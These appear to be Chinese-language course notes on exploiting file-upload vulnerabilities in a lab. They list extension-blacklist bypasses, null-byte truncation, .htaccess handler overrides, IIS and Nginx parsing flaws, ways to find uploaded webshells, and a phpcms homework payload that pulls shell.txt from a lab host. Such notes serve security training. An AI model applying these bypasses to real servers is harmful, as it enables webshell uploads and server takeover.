中间件
	url  http://172.16.12.2/upload/shell1.php3
.php5 .php4 ==>  php 文件 交给php程序运行
.php3 .php2 .php1 .phtml .pht .shtml ==> 直接显示文件内容
.html ==> 前端文件 交给浏览器运行

php环境 黑名单上传绕过
1.测试默认解析的其他后缀
.php5 .php4 .php3 .php2 .php1 .phtml .pht .shtml 
2.基于操作系统特性进行绕过
Windows 不规则文件名自动去除
	黑名单 .php. .php空格 .php::$DATA
	~!@#$%^&*()_+,.<>:"'; ==> ,<>|{}[].;:
	白名单 .php:1.jpg
3.基于php语言版本特性
php 由c语言编写  0x00 截断符号 
白名单绕过
00截断
条件：
php < 5.3.4
magic_quotes_gpc = off  ' " \ NULL 加反斜杠转义
保存文件路径参数可控
save_path=upload/1.php+1.jpg  ==> hex 2b==> 00
save_path=upload/1.php1.jpg
保存upload/1.php
4.基于中间件的补充配置文件
apache httpd 

分布式配置文件   .htaccess
AllowOverride All
AddType application/x-httpd-php .jpg

Apache Httpd 中间件解析漏洞
1.多后缀文件解析  1.x/2.x
test.php.aaa.bbb.ccc 从右向左判断 
2.配置问题
/etc/httpd/conf/httpd.conf

AddHandler php5-script .abc
AddType application/x-httpd-php .abc
3.补充配置文件 .htaccess 修改mime-types对应解析
<FilesMatch ".jpg"> SetHandler application/x-httpd-php </FilesMatch>
AddType application/x-httpd-php .jpg
黑名单下利用

1.目录解析
目录名中带.asp asa等等都会将这些目录下的文件解析成asp
2.特殊文件名解析
shell1.asa;.jpg  ==> shell1.asa ==> asp
3.默认解析
IIS 6.0 
asp默认解析
	asp asa cer cdx aspx asmx asax ashx ascx==> asp
	asp.dll 
IIS > 7.0 
	asp asa aspx asmx ==> asp

IIS 7.0/7.5/Nginx 畸形解析漏洞
1.png  ==> http://172.16.12.2/1.png/.php 

Nginx 空字节解析漏洞
nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37
1.png  ==> http://172.16.12.2/1.png%00.php




文件上传漏洞挖掘测试思路
1.上传正常图片马文件抓包
2.改文件后缀 php asp aspx jsp
3.根据回显内容识别检测方式 
黑名单  ==> shell.php不允许上传
1.Windows 
大小写 .php. .php空格 .php:.jpg .php::$DATA 
.htaccess .php5-1 .phtml .pht .shtml 
2.Linux 
.htaccess .php5-1 .phtml .pht .shtml 
3.中间件解析漏洞
Apache httpd 
多后缀名解析    	.php.aaa.bbb.ccc
配置错误			.jpg .png .gif .7z 
.htaccess 分布式配置文件 
<FilesMatch ".jpg"> SetHandler application/x-httpd-php </FilesMatch>
AddType application/x-httpd-php .jpg
IIS 6.0
目录解析     1.asp/1.png ==> asp
特殊文件名解析 shell.asp;.jpg
默认解析
	asp asa cer cdx aspx asmx asax ashx ascx ==> asp
IIS > 7.0/7.5  
默认解析
	asp asa aspx asmx ==> asp
畸形解析漏洞
	iis+php fastcgi模式  
	shell.jpg/.php ==> php
Nginx 
畸形解析漏洞
	Nginx+php fastcgi模式  
	shell.jpg/.php ==> php

Nginx 空字节解析漏洞
nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37
1.png  ==> http://172.16.12.2/1.png%00.php

白名单  ==> 仅允许上传png,jpg,gif,zip,rar
IIS6.0 目录解析 1.asp/1.png 特殊文件名解析  1.asp;.png
IIS7.0/7.5/Nginx 畸形解析漏洞  1.jpg/.php
Nginx空字节解析漏洞	1.jpg%00.php
Apache httpd  配置错误解析 1.jpg ==> php

上传文件后未返回文件路径
1.使用正常图片途径拼接
2.爬虫爬取目录拼接访问
3.google site:domain 目录结构
4.爆破目录


作业：
1.完成phpcms任意文件上传-扩展实验
本地准备文件 modelid=11 info[content]=<img src=http://172.16.12.167:9090/shell.txt?.php#.jpg>
2.完成nginx/iis6.0/iis7.5解析漏洞实验

